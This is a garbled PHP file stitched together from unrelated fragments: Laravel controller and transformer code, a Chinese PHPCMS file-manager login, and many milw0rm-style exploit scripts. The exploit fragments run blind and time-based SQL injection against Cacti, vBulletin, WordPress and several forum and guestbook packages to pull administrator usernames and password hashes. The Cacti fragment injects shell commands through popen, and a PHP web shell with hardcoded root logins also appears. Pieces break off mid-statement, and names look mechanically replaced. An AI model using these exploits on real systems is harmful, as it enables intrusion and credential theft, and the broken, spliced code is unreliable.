public function verify($username, $password)
{
$credentials = ['username' => $username, 'password' => $password];
$person = new Person();
$resp = $person->getUsername($credentials['username']);
if (!empty($resp)) {
if (\Hash::check($credentials['password'], $resp['password'])) {
$auth = true;
} else {
//check for old hashing
if (md5($credentials['password']) == $resp['password']) {
//convert old pass to new hashing
$resp['password'] = bcrypt($credentials['password']);
$id = my_encode($resp['id']);
$person->update($id, $resp);
$auth = true;
} else {
$auth = false;
}
}
} else {
//invalid user
$auth = false;
}
if ($auth) {
$result = $person->respondWithItem($resp, new UserTransformer());
session()->put('user', $result);
return my_decode($resp['id']);
}
return false;
}
function createUriList($tempSiteMap, $path)
{
$uriList = [];
foreach ($tempSiteMap as $parent => $child) {
if (is_string($child)) {
$uriList[] = $path . my_encode($child) . '.html';
} elseif (is_array($child)) {
$newPath = $path . my_encode($parent) . '/';
$uriList[] = $newPath;
$uriList = array_merge($uriList, createUriList($child, $newPath));
} else {
echo 'File: ' . __FILE__ . ' Line:' . __LINE__ . ' An error has occurred: Bad JSON node';
die;
}
}
return $uriList;
}
public function index(Request $request)
{
$params = $request->all();
$session = OauthCustomSession::find(get_token($request));
if ($session->role == 'U') {
return response(['error' => 'User not authorize to this resource.']);
}
$data['items'] = [];
$data['totalRecords'] = 0;
$data['limit'] = isset($params['limit']) ? $params['limit'] : 5;
$data['skip'] = isset($params['skip']) ? $params['skip'] : 0;
//get all
$option = ['limit' => $data['limit'], 'skip' => $data['skip']];
$response = $this->person->all($option);
if (!isset($response['error'])) {
$data['totalRecords'] = $response['totalRecords'];
foreach ($response['data'] as $row) {
//get users report count
$reports = $this->report->getReportsByPerson($row['id']);
$row['id'] = my_encode($row['id']);
$row['totalIReport'] = 0;
$row['totalGReport'] = 0;
if (!empty($reports['data'])) {
foreach ($reports['data'] as $srow) {
if ($srow['report_type'] == 0) {
$row['totalIReport'] += 1;
} else {
$row['totalGReport'] += 1;
}
}
}
$data['items'][] = $row;
}
return response(['data' => $data]);
} else {
return response(['error' => $response['error']]);
}
}
/**
* Turn this item object into a generic array
*
* @param array $item
*
* @return array
*/
public function transform($item)
{
return ['id' => my_encode($item['id']), 'comment' => isset($item['comment']) ? $item['comment'] : '', 'person_id' => isset($item['person_id']) ? my_encode($item['person_id']) : '', 'item_id' => isset($item['item_id']) ? my_encode($item['item_id']) : '', 'created' => isset($item['created']) ? $item['created'] : '', 'updated' => isset($item['updated']) ? $item['updated'] : ''];
}
/**
* Turn this item object into a generic array
*
* @param array $item
*
* @return array
*/
public function transform($item)
{
return ['id' => my_encode($item['id']), 'name' => $item['name'], 'description' => isset($item['description']) ? $item['description'] : '', 'created' => isset($item['created']) ? $item['created'] : '', 'person_id' => isset($item['person_id']) ? my_encode($item['person_id']) : '', 'author' => isset($item['author']) ? $item['author'] : '', 'is_archive' => isset($item['is_archive']) ? $item['is_archive'] : '', 'report_type' => isset($item['report_type']) ? $item['report_type'] : ''];
}
)
)
$polling_items[arg1] is passed to a popen() call in /include/poller.php,
see exec_poll() function...
you do not have any output but you can redirect it to some file in /rra
or /log folder which is 'cactiuser''
*/
$command = my_encode($cmd . " > ./rra/suntzu.log");
$h = my_encode("127.0.0.1");
$pr = my_encode("proc");
$sql = "1111)/**/UNION/**/SELECT/**/2,0,1,1,{$h},null,1,null,null,161,500,{$pr},null,1,300,0,{$command},null,null/**/FROM/**/host/*";
$packet = "GET " . $p . "cmd.php?1+{$sql}+11111 HTTP/1.0\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Connection: Close\r\n\r\n";
sendpacketii($packet);
sleep(2);
$packet = "GET " . $p . "rra/suntzu.log HTTP/1.0\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Connection: Close\r\n\r\n";
sendpacketii($packet);
echo $html;
$command = my_encode("rm ./rra/suntzu.log");
$sql = "1111)/**/UNION/**/SELECT/**/2,0,1,1,{$h},null,1,null,null,161,500,{$pr},null,1,300,0,{$command},null,null/**/FROM/**/host/*";
$packet = "GET " . $p . "cmd.php?1+{$sql}+11111 HTTP/1.0\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Connection: Close\r\n\r\n";
sendpacketii($packet);
?>
# milw0rm.com [2006-12-27]
break;
}
}
if ($i == 255) {
die("\nExploit failed...");
}
}
$j++;
}
echo "\n";
$j = 1;
$admin = "";
echo "admin user -> ";
while (!strstr($admin, chr(0))) {
for ($i = 0; $i <= 255; $i++) {
$sql = "9999999)/**/OR/**/1=(SELECT/**/(IF((ASCII(SUBSTRING(username," . $j . ",1))=" . $i . "),1,0))/**/FROM/**/bb1_users/**/LIMIT/**/1)/**/AND/**/subject=" . my_encode("sun-tzu") . "/*";
$sql = urlencode($sql);
$data = "action=delmark";
$data .= "&pmid[0]={$sql}";
$data .= "&folderid=outbox";
$packet = "POST " . $p . "pms.php HTTP/1.0\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Content-Length: " . strlen($data) . "\r\n";
$packet .= "Cookie: " . $cookie . "\r\n";
$packet .= "Connection: Close\r\n\r\n";
$packet .= $data;
sendpacketii($packet);
sleep(1);
if (!check_pm()) {
$admin .= chr($i);
echo "password -> " . $password . "[???]\r\n";
sleep(2);
break;
}
}
if ($i == 255) {
die("Exploit failed...");
}
}
$j++;
}
$admin = "";
$j = 1;
while (!strstr($admin, chr(0))) {
for ($i = 0; $i <= 255; $i++) {
$sql = $prefix . "users/**/WHERE/**/user_group=" . my_encode("Administrator") . "/**/AND/**/(IF((ASCII(SUBSTRING(username," . $j . ",1))=" . $i . "),benchmark(900000,sha1(" . my_encode("suntzu") . ")),-1))/*";
echo "sql -> " . $sql . "\r\n";
$sql = urlencode($sql);
$data = "old_prefix=" . $sql;
$data .= "&member_accounts=0";
$data .= "&rooms=0";
$data .= "&settings=1";
$data .= "&connvert=0";
$packet = "POST " . $p . "upgradev1.php?step=3 HTTP/1.0\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Content-Length: " . strlen($data) . "\r\n";
$packet .= "Connection: Close\r\n\r\n";
$packet .= $data;
usleep(2000000);
$starttime = time();
<?php
error_reporting(0);
session_start();
unset($user);
// Just in case ;-]
unset($pass);
if ($_POST['cmd']) {
$_POST['cmd'] = my_encode($_POST['cmd']);
}
$cache_lines = 1000;
$history_lines = 100;
$history_chars = 20;
$user[] = "root";
$pass[] = md5("fuckyou");
$user[] = "user";
$pass[] = md5("fuckhacker");
$alias = array("la" => "ls -la", "rf" => "rm -f", "unbz2" => "tar -xjpf", "ungz" => "tar -xzpf");
if (!$_SESSION['user']) {
$pr_login = "******";
$pr_pass = "******";
$err = "Invalid login!\n\n";
$succ = "Warning! \nDon`t be stupid .. this is a priv3 server, so take extra care!!!\n\n";
if ($_SESSION['login'] && $_POST['cmd']) {
// WE HAVE USERNAME & PASSWORD
$_SESSION['output'] .= $pr_pass;
if (in_array($_SESSION['login'], $user)) {
//........ USERNAME EXISTS
$key = array_search($_SESSION['login'], $user);
if ($pass[$key] != md5($_POST['cmd'])) {
//....... WRONG PASSWORD
/**
* Turn this item object into a generic array
*
* @param array $item
*
* @return array
*/
public function transform($item)
{
return ['id' => my_encode($item['id']), 'report_id' => isset($item['report_id']) ? my_encode($item['report_id']) : '', 'person_id' => isset($item['person_id']) ? my_encode($item['person_id']) : '', 'person_name' => isset($item['person_name']) ? my_encode($item['person_name']) : '', 'created' => isset($item['created']) ? $item['created'] : '', 'updated' => isset($item['updated']) ? $item['updated'] : ''];
}
}
$j++;
}
$packet = "GET " . $path . "u2u.php?action=emptytrash HTTP/1.0\r\n";
$packet .= "Referer: http://" . $host . $path . "u2u.php\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Connection: Close\r\n";
$packet .= "Cookie: " . $cookie . "\r\n\r\n";
sendpacketii($packet);
$unused = array('<', '>', '|', '"', '[', ']', '\\', ',', '@', '\'', ' ');
$j = 1;
$admin = "";
while (!strstr($admin, chr(0))) {
for ($i = 0; $i <= 255; $i++) {
if (!in_array(chr($i), $unused)) {
$sql = "999999'/**/or/**/(1=(SELECT(IF((ASCII(SUBSTRING(username," . $j . ",1))=" . $i . "),1,0))/**/FROM/**/" . $prefix . "members/**/WHERE/**/status=" . my_encode("Super Administrator") . ") AND owner=" . my_encode($user) . ")/*";
echo "sql -> " . $sql . "\r\n";
$sql = urlencode($sql);
$data = "u2uid=" . $sql;
$data .= "&msgto=" . $user;
//send to yourself
$data .= "&subject=hello";
$data .= "&message=hellohellohello";
$data .= "&del=yes";
$data .= "&sendsubmit=1";
$packet = "POST " . $path . "u2u.php?action=send HTTP/1.0\r\n";
$packet .= "Referer: http://" . $host . $path . "u2u.php\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Connection: Close\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Cookie: " . $cookie . "\r\n";
/*
|--------------------------------------------------------------------------
| Routes File
|--------------------------------------------------------------------------
|
| Here is where you will register all of the routes in an application.
| It's a breeze. Simply tell Laravel the URIs it should respond to
| and give it the controller to call when that URI is requested.
|
*/
Route::get('/test', function () {
// $this->cc = new \CouchbaseCluster(env('CB_HOST', 'couchbase://localhost'), 'admin', 'password');
// $this->cb = $this->cc->openBucket(env('CB_BUCKET', '5sportal'));
// pr($this->cb->get('person_2'));
pr(my_encode(112));
});
Route::get('/', function () {
return view('welcome');
});
/*
|--------------------------------------------------------------------------
| Application Routes
|--------------------------------------------------------------------------
|
| This route group applies the "web" middleware group to every route
| it contains. The "web" middleware group is defined in your HTTP
| kernel and includes session state, CSRF protection, and more.
|
*/
Route::group(['middleware' => ['web']], function () {
} else {
if ($_POST["action"] != "login") {
echo deal_temp("temp/{$tempname}/login.htm", array("title" => $title));
die;
}
$user_orig = $_POST["user_name"];
$pass_orig = $_POST["user_pass"];
$user_name = my_encode($user_orig);
$user_pass = my_encode($pass_orig);
$users = file("class/users.php");
for ($i = 1; $i < count($users); $i++) {
if (!trim($users[$i])) {
continue;
}
$arr = explode("|", $users[$i]);
if ($user_name == my_encode($arr[0]) && $user_pass == $arr[1]) {
mkcookie('user_name', $user_name);
mkcookie('user_pass', $user_pass);
mkcookie('last_time', date("D, d M Y H:i:s") . " GMT");
inlog("登陆成功,用户名:" . $user_orig);
if ($user_orig == "admin" && $pass_orig == "admin") {
exit("<script language=javascript>alert(\"欢迎使用 PHPCMS 文件管理器 \\n您是第一次登陆本程序\\n现在请修改默认密码!\");window.location = 'admin.php?action=muser&name=admin';</script>");
} else {
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<meta http-equiv="refresh" content="1;url=index.php">
<title><?php
echo $title;
?>
function check_login()
{
global $usecookie;
$user = getcookie("user_name");
$pass = getcookie("user_pass");
$group = array();
$dd = array();
$r = "newdir|newfile|downfile|zippack|unpack|upfile|copy|move|savefromurl|delete|viewsorce|rename|savefile|select|property|admin|search|";
$arr = explode("|", $r);
foreach ($arr as $r) {
$dd["{$r}"] = false;
}
$users = @file("class/users.php");
$groups = @file("class/group.php");
for ($i = 1; $groups[$i]; $i++) {
$v = trim($groups[$i]);
if (!$v || !strpos($v, "|")) {
continue;
}
$arr = explode("|", $v);
$group["{$arr['0']}"] = str_replace($arr[0], '', $v);
}
for ($i = 1; $users[$i]; $i++) {
$arr = explode("|", $users[$i]);
if ($user == my_encode($arr[0]) && $pass == $arr[1]) {
$dd["root"] = $arr[2];
$dd["name"] = $arr[0];
$dd["group"] = $arr[3];
$rights = $group["{$arr[3]}"];
$right = explode("|", $rights);
for ($j = 0; $j < count($right); $j++) {
$v = $right[$j];
if (!$v) {
continue;
}
if (strrpos($v, "&")) {
if (substr($v, 0, 1) == "&") {
$v = substr($v, 1, strlen($v));
}
$dd["limittype"] = str_replace("&", ",", $v);
$arr = explode('&', $v);
$dd["limit"] = array();
foreach ($arr as $v) {
if (!$v) {
continue;
}
$dd["limit"]["{$v}"] = 1;
}
} else {
$dd["{$v}"] = 1;
}
}
return $dd;
}
}
}
/**
* Turn this item object into a generic array
*
* @param array $item
*
* @return array
*/
public function transform($item)
{
return ['id' => my_encode($item['id']), 'username' => $item['username'], 'first_name' => isset($item['first_name']) ? $item['first_name'] : '', 'last_name' => isset($item['last_name']) ? $item['last_name'] : '', 'gender' => isset($item['gender']) ? $item['gender'] : '', 'email' => isset($item['email']) ? $item['email'] : '', 'userimage' => isset($item['userimage']) ? $item['userimage'] : '', 'city' => isset($item['city']) ? $item['city'] : '', 'state' => isset($item['state']) ? $item['state'] : '', 'country' => isset($item['country']) ? $item['country'] : '', 'occupation' => isset($item['occupation']) ? $item['occupation'] : '', 'role' => isset($item['role']) ? $item['role'] : '', 'created' => isset($item['created']) ? $item['created'] : '', 'updated' => isset($item['updated']) ? $item['updated'] : '', 'totalIReport' => isset($item['totalIReport']) ? $item['totalIReport'] : 0, 'totalGReport' => isset($item['totalGReport']) ? $item['totalGReport'] : 0];
}
}
makeup("class/users.php");
exit4("用户 {$username} 添加成功!", @fclose($fp));
} else {
$users = @file("class/users.php");
$content = "";
foreach ($users as $v) {
if (!$v) {
continue;
}
$arr = explode("|", $v);
if ($arr[0] == $username) {
if ($arr[1] != my_encode($_POST["origpass"]) && $user["group"] != "administrators") {
exit4("由于您不在administrators组\\n只有输入正确的密码才能继续操作!", 0);
}
$password = $password ? my_encode($password) : $arr[1];
$content .= "{$username}|{$password}|{$root}|{$group}|\n";
} else {
$content .= "{$v}\n";
}
}
$action = "user";
if (!is_dir($root)) {
if (@mkdir($root)) {
exit4("{$root} 创建失败!", 0);
}
}
if (@file_put_contents("class/users.php", $content)) {
makeup("class/users.php");
exit4("用户 {$username} 更新成功!");
} else {
//debug
echo $html . "\r\n";
die("Exploit failed...maybe wrong table prefix");
}
}
$j++;
}
$admin = str_replace(chr(0), "", $admin);
echo "admin -> " . $admin . "\r\n";
$password = "";
$j = 1;
while (!strstr($password, chr(0))) {
for ($i = 0; $i <= 255; $i++) {
$starttime = time();
echo "starttime -> " . $starttime . "\r\n";
$sql = "99999 UNION SELECT IF((ASCII(SUBSTRING(password," . $j . ",1))=" . $i . ") & 1, benchmark(50000000,CHAR(0)),0) FROM " . $prefix . "users WHERE username="******" ", "/**/", $sql);
$sql = urlencode($sql);
$packet = "GET " . $p . "index.php?shard=blog&action=proc_reply HTTP/1.0\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Cookie: ID=" . $sql . ";\r\n";
$packet .= "Connection: Close\r\n\r\n";
echo quick_dump($packet) . "\r\n";
sendpacketii($packet);
$endtime = time();
echo "endtime -> " . $endtime . "\r\n";
$difftime = $endtime - $starttime;
echo "difftime -> " . $difftime . "\r\n";
if ($difftime > 5) {
$password .= chr($i);
echo "password -> " . $password . "[???]\r\n";
if ($add_admin) {
echo "admin user added with username 'suntzu' and password 'suntzu'...";
}
} else {
echo "exploit failed...";
}
} elseif ($action == 2) {
function is_hash($hash)
{
if (ereg("([a-f0-9]{32})", trim($hash))) {
return true;
} else {
return false;
}
}
$SQL = "9999999/**/UNION/**/SELECT/**/null,userpassword,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/FROM/**/" . $prefix . "user/**/WHERE/**/username="******"/*";
$data = "-----------------------------7d61bcd1f033e\r\n";
$data .= "Content-Disposition: form-data; name=\"board[styleid]\";\r\n\r\n";
$data .= "{$SQL}\r\n";
$data .= "-----------------------------7d61bcd1f033e--\r\n";
$packet = "POST " . $p . "index.php HTTP/1.0\r\n";
$packet .= "SUNTZU: " . $argu . "\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Content-Length: " . strlen($data) . "\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
sendpacketii($packet);
if (eregi("<pre><b>ThWboard Error</b><br>", $html)) {
echo $html;
die("\n\nquery error... see html");
/**
* Turn this item object into a generic array
*
* @param array $item
*
* @return array
*/
public function transform($item)
{
return ['id' => my_encode($item['id']), 'media' => isset($item['media']) ? $item['media'] : '', 'location' => isset($item['location']) ? $item['location'] : '', 'item_id' => isset($item['item_id']) ? my_encode($item['item_id']) : '', 'person_id' => isset($item['person_id']) ? my_encode($item['person_id']) : '', 'created' => isset($item['created']) ? $item['created'] : '', 'updated' => isset($item['updated']) ? $item['updated'] : ''];
}
/**
* Turn this item object into a generic array
*
* @param array $item
*
* @return array
*/
public function transform($item)
{
return ['id' => my_encode($item['id']), 'title' => isset($item['title']) ? $item['title'] : '', 'comment' => isset($item['comment']) ? $item['comment'] : '', 'description' => isset($item['description']) ? $item['description'] : '', 'person_id' => isset($item['person_id']) ? my_encode($item['person_id']) : '', 'report_id' => isset($item['report_id']) ? my_encode($item['report_id']) : '', 'is_archive' => isset($item['is_archive']) ? $item['is_archive'] : '', 'created' => isset($item['created']) ? $item['created'] : '', 'updated' => isset($item['updated']) ? $item['updated'] : ''];
}
calling directly the /code/guestadd.php script
we have sql injections in multiple arguments, "newmessage",
"newname","newwebsite","newemail"
and we can use quotes because we have:
[argument] = str_replace("\'","'",[argument]);
on every ones
oh, let me see our query...
INSERT INTO phpusql_guestbook VALUES('1', '[injection here]
so...
*/
$UTAG = my_encode("<USER>");
$PTAG = my_encode("<PASS>");
$SQL = "1',(SELECT/**/CONCAT(" . $UTAG . ",username," . $UTAG . ")/**/FROM/**/" . $prefix . "users/**/WHERE/**/ADMIN=1),";
$SQL .= "(SELECT/**/CONCAT(" . $PTAG . ",password," . $PTAG . ")/**/FROM/**/" . $prefix . "users/**/WHERE ADMIN=1),'1','1.1.1.1','1')";
$SQL .= "/**/ON/**/DUPLICATE /**/KEY/**/UPDATE/**/autono=autono+1/*";
//funny, isn't it? :) we hide password hashes inside guestbook html
//also, I note this, we have a spoofing issue, beacuse of extract()
//let's overwrite the ip address...
$data = '-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="_SERVER[REMOTE_ADDR]";
1.1.1.1
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="newmessage";
1
-----------------------------7d61bcd1f033e
}
}
return $encoded;
}
$j = 1;
$my_uid = "";
echo "\nyour user id -> ";
while (!strstr($my_uid, chr(0))) {
for ($i = 0; $i <= 255; $i++) {
if (in_array($i, $chars)) {
$data = "s=";
$data .= "&do=docopyposts";
$data .= "&destforumid={$forumid}";
$data .= "&title=suntzu";
$data .= "&forumid={$forumid}";
$data .= "&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(userid," . $j . ",1))=" . $i . "),{$existing_post},-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/user/**/WHERE/**/username="******"/**/LIMIT/**/1/*";
$packet = "POST " . $p . "inlinemod.php?f={$forumid} HTTP/1.0\r\n";
$packet .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet .= "Referer: http://" . $host . $path . "profile.php\r\n";
$packet .= "Accept-Language: it\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Content-Length: " . strlen($data) . "\r\n";
$packet .= "Pragma: no-cache\r\n";
$packet .= "Cookie: " . $cookie . "; \r\n";
$packet .= "Connection: Close\r\n\r\n";
$packet .= $data;
sendpacketii($packet);
if (eregi("You have an error in your SQL syntax", $html)) {
echo $html;
break;
}
}
if ($i == 255) {
die("\nExploit failed...");
}
}
$j++;
}
echo "\n";
echo "admin user -> ";
$j = 1;
$admin = "";
while (!strstr($admin, chr(0))) {
for ($i = 0; $i <= 255; $i++) {
$sql = "999999/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(user_login," . $j . ",1))=" . $i . ")," . my_encode("open") . "," . my_encode("sun-tzu") . "))/**/FROM/**/" . $prefix . "users/**/WHERE/**/ID=1/*";
$data = "-----------------------------7d61bcd1f033e\r\n";
$data .= "Content-Disposition: form-data; name=\"title\";\r\n\r\n";
$data .= "1\r\n";
$data .= "-----------------------------7d61bcd1f033e\r\n";
$data .= "Content-Disposition: form-data; name=\"url\";\r\n\r\n";
$data .= "1\r\n";
$data .= "-----------------------------7d61bcd1f033e\r\n";
$data .= "Content-Disposition: form-data; name=\"blog_name\";\r\n\r\n";
$data .= "1\r\n";
$data .= "-----------------------------7d61bcd1f033e\r\n";
$data .= "Content-Disposition: form-data; name=\"tb_id\";\r\n\r\n";
$data .= "{$sql}\r\n";
$data .= "-----------------------------7d61bcd1f033e\r\n";
$data .= "Content-Disposition: form-data; name=\"1740009377\";\r\n\r\n";
$data .= "1\r\n";